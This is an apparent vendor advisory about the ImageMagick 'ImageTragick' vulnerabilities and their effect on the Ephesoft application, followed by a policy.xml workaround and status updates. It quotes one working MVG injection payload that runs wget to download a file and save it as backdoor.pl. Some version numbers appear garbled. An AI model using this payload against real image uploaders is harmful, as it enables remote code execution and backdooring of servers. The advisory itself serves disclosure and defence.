The latest versions of ImageMagick doesn’t properly filter the file names that get passed to the internal delegates that handle external protocols (like HTTPS). This allows an attacker to execute his own commands remotely by uploading an image. This leads to a full RCE (remote command execution) vulnerability in your image uploader.
The vulnerability is very simple to exploit, an attacker only needs a image uploader tool that leverages ImageMagick. During our research we found many popular web applications and SaaS products vulnerable to it (people love gravatars), and we have been contacting them privately to get things patched. Unfortunately, even with all the media attention, not everyone is aware of this issue.
Going into a bit more details, this vulnerability can actually be divided in 4 different issues (or maybe 5, depending on who you ask), that is very well explained by Karim Valiev from the Mail.Ru Security Team here. So summarize, this is what we have to be aware:
Remote command execution on .mvg/.svg file uploads. By proving a malicious file, an attacker can force a shell command to be executed on the server. This is a very simple example being shared lately:
image Over 0,0 1,1 ‘url(https:”;wget “http://pastebin.com/raw/badpastebin” -O /home/vhosts/file/backdoor.pl”)’
When that gets added to a MVG file, the wget command is executed and the output of the pastebin file saved on backdoor.pl.
Remote file deletion. When using the “ephemeral:/” protocol, an attacker can remove files on the server
Remote file moving: Similar to the file deletion issue, but when using the “msl:/” pseudo protocol, the attacker can move files around
File content disclosure when using the “label:@” protocol.
When combining all these issues, the attackers have a wide range of options and tools to compromise a web application that leverages ImageMagick. Note that only filtering for MGV extension is not enough, as any file format will be inspected and the command executed.
Status of different versions:
ImageMagick 7.0.1-2 and 6.9.4-0 (issues resolved)
Impact on Ephesoft Application:
ImageMagick v6.9.1 is the current version we are using and is vulnerable to these types of exploits.
Here are the workaround instructions:
In the file <ephesoft installation>\Dependencies\ImageMagick\policy.xml, please add the following lines to the <policymap> section.
<policy domain=”coder” rights=”none” pattern=”EPHEMERAL” />
<policy domain=”coder” rights=”none” pattern=”HTTPS” />
<policy domain=”coder” rights=”none” pattern=”MVG” />
<policy domain=”coder” rights=”none” pattern=”MSL” />
<policy domain=”coder” rights=”none” pattern=”TEXT” />
<policy domain=”coder” rights=”none” pattern=”SHOW” />
<policy domain=”coder” rights=”none” pattern=”WIN” />
<policy domain=”coder” rights=”none” pattern=”PLT” />
<policy domain=”path” rights=”none” pattern=”@*” />
You can test these settings by typing <ephesoft installation>\Dependencies\ImageMagick\convert -list policy and it should now list these settings.
UPDATE (May 9th, 2016):
Compatibility testing for imagemagick 220.127.116.11 is currently being performed and this will be implemented as the permanent solution. ETA – TBD.
UPDATE (October 4th, 2016):
The workaround regarding the policy.xml settings have been added to Installer v18.104.22.168 and higher. The update to the imagemagick version is still pending.